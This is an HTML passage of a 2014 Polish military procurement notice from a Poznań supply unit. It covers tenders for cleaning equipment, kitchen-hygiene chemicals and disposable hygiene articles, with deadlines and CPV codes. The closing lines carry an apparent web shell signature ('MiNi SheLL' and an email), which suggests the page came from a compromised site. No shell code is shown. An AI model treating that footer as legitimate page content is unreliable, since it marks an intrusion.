3.Wybrany Wykonawca przed podpisaniem umowy o wykonanie zamówienia przedłoży Zamawiającemu (dla zadania nr 2):
dokumenty potwierdzające uprawnienia, kwalifikacje i doświadczenie osób wymienionych w zestawieniu (wzór załącznik nr 8 do SIWZ), które będą przeprowadzać przeszkolenia personelu służby żywnościowej z zakresu BHP w tematyce bezpiecznego użytkowania i posługiwania się dostarczonymi środkami oraz z zakresu GHP i GMP środków oferowanych przez Wykonawcę w zakresie utrzymania higieny w kuchni, stołówce i magazynie żywnościowym w ujęciu stosowania środków, uzyskania efektu mycia lub/i dezynfekcji i ich wpływu na konsumentów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.14wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 14 Wojskowy Oddział Gospodarczy w Poznaniu ul. Bukowska 34, 60-811 Poznań, Sekcja Zamówień Publicznych- budynek nr 5, wejście C, pokój 6-7 od pon-pt w godz. 8.00-15.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2014 godzina 12:00, miejsce: 14 Wojskowy Oddział Gospodarczy w Poznaniu ul. Bukowska 34, 60-811 Poznań, Kancelaria Jawna- budynek nr 2, parter, pokój 17A od pon-pt w godz. 8.00-15.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 -   Dostawa sprzętu do utrzymania czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu do utrzymania czystości do zapewnienia prawidłowego funkcjonowania służby żywnościowej 14 Wojskowego Oddziału Gospodarczego w Poznaniu. 
Szczegółowy opis przedmiotu zamówienia oraz zestawienie asortymentowo - ilościowe określa: formularz cenowy załącznik nr 5/1,wymagania przedmiotowe załącznik nr 6 do SIWZ oraz w projekt umowy -część III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.20.00.00-0, 39.83.17.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 -Dostawa chemii profesjonalnej do utrzymania higieny i czystości w bloku żywnościowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa chemii profesjonalnej do utrzymania czystości  w bloku żywnościowym do zapewnienia prawidłowego funkcjonowania służby żywnościowej 14 Wojskowego Oddziału Gospodarczego w Poznaniu. 
Szczegółowy opis przedmiotu zamówienia oraz zestawienie asortymentowo - ilościowe określa: formularz cenowy załącznik nr 5/2, wymagania przedmiotowe załącznik nr 6 do SIWZ oraz w projekt umowy -część III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.70.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3-    Dostawa artykułów higienicznych i opakowań jednorazowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów higienicznych i opakowań jednorazowych do utrzymania czystości do zapewnienia prawidłowego funkcjonowania służby żywnościowej 14 Wojskowego Oddziału Gospodarczego w Poznaniu. 
Szczegółowy opis przedmiotu zamówienia oraz zestawienie asortymentowo - ilościowe określa: formularz cenowy załącznik nr 5/3 do SIWZ), wymagania przedmiotowe załącznik nr 6 do SIWZ oraz w projekt umowy -część III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com